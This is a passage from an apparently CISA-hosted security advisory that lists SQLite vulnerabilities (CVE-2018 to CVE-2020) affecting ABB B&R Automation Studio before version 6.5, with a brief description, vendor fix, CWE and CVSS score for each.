<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-15358</a></h3>
<div class="csaf-accordion-content">
<p>In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-15358">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-13632</a></h3>
<div class="csaf-accordion-content">
<p>There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-13632">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-13631</a></h3>
<div class="csaf-accordion-content">
<p>SQLite before 3.32.0 allows a virtual table to be renamed to the name of one of its shadow tables, related to alter.c and build.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-13631">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/286.html">CWE-286 Incorrect User Management</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-13630</a></h3>
<div class="csaf-accordion-content">
<p>ext/fts3/fts3.c in SQLite before 3.32.0 has a use-after-free in fts3EvalNextRow, related to the snippet feature.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-13630">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-13435</a></h3>
<div class="csaf-accordion-content">
<p>SQLite through 3.32.0 has a segmentation fault in sqlite3ExprCodeTarget in expr.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-13435">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-13434</a></h3>
<div class="csaf-accordion-content">
<p>SQLite through 3.32.0 has an integer overflow in sqlite3_str_vappendf in printf.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-13434">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-11656</a></h3>
<div class="csaf-accordion-content">
<p>In SQLite through 3.31.1, the ALTER TABLE implementation has a use-after-free, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-11656">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-11655</a></h3>
<div class="csaf-accordion-content">
<p>SQLite through 3.31.1 allows attackers to cause a denial of service (segmentation fault) via a malformed window-function query because the AggInfo object's initialization is mishandled.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-11655">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/754.html">CWE-754 Improper Check for Unusual or Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-19646</a></h3>
<div class="csaf-accordion-content">
<p>pragma.c in SQLite through 3.30.1 mishandles NOT NULL in an integrity_check PRAGMA command in certain cases of generated columns.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-19646">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/754.html">CWE-754 Improper Check for Unusual or Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-19645</a></h3>
<div class="csaf-accordion-content">
<p>alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-19645">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-8457</a></h3>
<div class="csaf-accordion-content">
<p>SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-8457">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-20506</a></h3>
<div class="csaf-accordion-content">
<p>SQLite before 3.25.3, when the FTS3 extension is enabled, encounters an integer overflow (and resultant buffer overflow) for FTS3 queries in a "merge" operation that occurs after crafted changes to FTS3 shadow tables, allow-ing remote attackers to execute arbitrary code by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases). This is a different vulnerability than CVE-2018-20346.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-20506">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-20505</a></h3>
<div class="csaf-accordion-content">
<p>SQLite 3.25.2, when queries are run on a table with a malformed PRIMARY KEY, allows remote attackers to cause a denial of service (application crash) by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-20505">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-20346</a></h3>
<div class="csaf-accordion-content">
<p>SQLite before 3.25.3, when the FTS3 extension is enabled, encounters an integer overflow (and resultant buffer overflow) for FTS3 queries that occur after crafted changes to FTS3 shadow tables, allowing remote attackers to execute arbitrary code by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases), aka Magellan.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-20346">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-8740</a></h3>
<div class="csaf-accordion-content">
<p>In SQLite through 3.22.0, databases whose schema is corrupted using a CREATE TABLE AS statement could cause a NULL pointer dereference, related to build.c and prepare.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-8740">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
